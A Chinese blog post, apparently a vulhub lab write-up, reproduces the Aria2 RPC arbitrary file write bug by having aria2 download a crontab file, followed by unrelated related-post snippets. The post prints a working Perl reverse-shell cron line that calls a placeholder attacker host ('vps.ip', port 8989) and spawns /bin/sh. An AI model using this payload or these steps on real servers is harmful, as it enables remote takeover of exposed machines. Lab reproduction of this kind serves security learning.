Aria2 任意文件写入漏洞

于 2024-05-24 10:47:25 发布
阅读量345 收藏 9
点赞数 6
分类专栏: vulhub复现学习合集 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/139162409
版权

Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。

启动漏洞环境:

```
docker compose up -d
```

6800是aria2的rpc服务的默认端口,环境启动后,访问`http://your-ip:6800/`,发现服务已启动并且返回404或空白页面。

因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/ 。

 如果报错,参考

Aria2 & YAAW 使用说明

 

 攻击机开http.server

 

打开yaaw,点击配置setting按钮,填入运行aria2的目标域名:`http://your-ip:6800/jsonrpc`

https://www.cnblogs.com/v1vvwv/p/how-to-use-crontab-to-getshell.html

内容:

*/1 * * * * root perl -e 'use Socket;$i="vps.ip";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
##

注意这个最后一行要有换行,否则可能反弹失败

这里url写http://文件在的那个电脑(我这里放攻击机上)ip/filename

注意此处只是为了真实环境区别,我这里靶机和攻撃机是同一台
 

反弹成功

shierbai
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub靶场——Aria2任意文件写入漏洞复现
ad12456的博客
05-16 991
0:前期准备: 靶机(CentOS7,IP:192.168.96.222),攻击机(kali ,IP:192.168.96.226) 安装靶场Vulhub,前面有写过步骤。 先了解aria2Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP /HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 通过控制文件下载链接,文件储存路径以
Aria2 任意文件写入漏洞复现
weixin_56537388的博客
11-09 210
Aria2 是一款轻量级、多协议、多源下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内置 XML-RPC 和 JSON-RPC 接口。我们可以使用 RPC 接口来操作 aria2 并将文件下载到任意目录,从而造成任意文件写入漏洞
08 - vulhub - Aria2 任意文件写入漏洞,美团面试在线编程
最新发布
m0_58397123的博客
04-16 1020
第二次的 test 文件我是借了朋友的VPS,在他的VPS上利用python临时模拟了一个服务器,将 定时任务文件放在临时服务器的目录下,执行下载操作,并开启了 7777 端口监听。书籍的好处就在于权威和体系健全,刚开始学习的时候你可以只看视频或者听某个人讲课,但等你学完之后,你觉得你掌握了,这时候建议还是得去看一下书籍,看权威技术书籍也是每个程序员必经之路。光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。但是,我又想反弹,所以踩坑了…
08 - vulhub - Aria2 任意文件写入漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-18 734
Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建`XML-RPC`和`JSON-RPC`接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
aria2.conf 配置文件
02-05
aria2.conf 配置文件
C#封装Aria2c类库接口,大文件下载断点续传,速度快稳定.rar
10-06
FlyVR.Aria2.Aria2cRuntime.Load(new FlyVR.Aria2.Aria2cSettings() { Aria2Args = "", Aria2Host = "localhost", Aria2Path = "aria2c.exe(aria2c的路径)", Aria2Port = 6800 }); FlyVR.Aria2.Aria2c faa = new ...
Aria2GUI 网盘插件
04-25
使用方法:大家解压后先将Aria2GUI.app主程序拖到应用里面运行(可以将其添加到开机启动),然后下载对应的网盘插件通过浏览器导出aria2,另外,使用Chrome浏览器可配合YAAW-for-Chrome插件接管浏览器的所有下载到...
Aria2 for Chrome-2.1.4.zip
12-27
名称:Aria2 for Chrome ---------------------------------------- 版本:2.1.4 作者:Alex Hua 分类:实用工具 ---------------------------------------- 概述:让Aria2无缝接管下载,加速下载体验,内建Aria2...
Aria2 任意文件编写漏洞
Y01010kk的博客
11-12 807
Aria2 是一款轻量级、多协议、多源下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内置 XML-RPC 和 JSON-RPC 接口。 我们可以使用 RPC 界面操作 aria2 并将文件下载到任何目录,从而导致任意文件编写漏洞 大家看见我这个 估计网上可以找到很多关于这个的文章 在这里 我只将我部署docker环境以及实现aria2 文件漏洞这个实验遇到的问题 给大家分享一下 相信大家都是对这块比较好奇地 我直接从问题开始讲了 在结尾我会把步骤做一个总...
Aria2
xiwangyizhicunzai的博客
11-01 7119
Aria2 任意文件写入漏洞 简介: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),Aria2 支持许多 curl 和 wget 不支持的协议,例如:BT、磁力链接等等,内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个...
vulhub漏洞复现系列之aria2任意文件写入漏洞
weixin_43071873的博客
12-08 705
我的天,这个漏洞的复现,你看了我的博客之后你再说不会复现我揍你我跟你讲!(狗头保命) 工具介绍: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞漏洞描述: 通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入。同时通过Aria2提供的其他功能,诸
利用Vulnhub复现漏洞 - Aria2 任意文件写入漏洞
JiangBuLiu的博客
06-28 1335
Aria2 任意文件写入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/aria2/rce/README.zh-cn.md 漏洞原理 Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink...
Aria2 任意文件上传
AaronLuo
06-11 1369
Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。 信息收集 nmap -sS -T5 -n -p- 192.168.50.128 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-06 16:41 ?D1ú±ê
利用Vulnhub复现漏洞 - ActiveMQ任意文件写入漏洞(CVE-2016-3088)
JiangBuLiu的博客
06-27 1809
可点击目录分类快捷浏览↓Vulnhub官方复现教程漏洞原理背景简述漏洞详情复现漏洞启动环境写入webshell上传webshell设置浏览器代理配置(与Burp拦截设置一致)打开Burp Suite设置拦截端口(主机)(与浏览器设置一致)在Burp Suite的拦截抓包中写入WebShell移动到web目录下的api文件夹中:原教程移动到web目录下的api文件夹(/opt/activemq/we...
Aria2任意文件写入漏洞
浅笑996的博客
11-26 1761
Aria2 Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。 环境搭建 启动漏洞环境: cd vulhub-master/aria2/rce/ sudo docker-compose up 6800是aria2的RPC服务的默认端口,环境启动后,访问 http://your...
aria2 配置文件
09-09
aria2 是一款轻量级的多线程下载工具,以下是一个简单的 aria2 配置文件示例: ``` # 文件名:aria2.conf # 设置 RPC 监听端口 rpc-listen-port=6800 # 设置 RPC 认证信息,用户名和密码 rpc-user=username rpc-passwd=password # 设置下载路径 dir=/path/to/downloads # 设置最大同时下载数和最大同时连接数 max-concurrent-downloads=5 max-connection-per-server=16 # 设置下载速度限制 max-overall-download-limit=0 max-download-limit=0 max-overall-upload-limit=0 max-upload-limit=0 # 设置 BT 下载相关参数 bt-max-peers=55 bt-tracker=udp://tracker.openbittorrent.com:80 ``` 以上是一个简单的 aria2 配置文件示例,你可以根据自己的需求进行修改。更多详细的配置项可以参考 aria2 官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值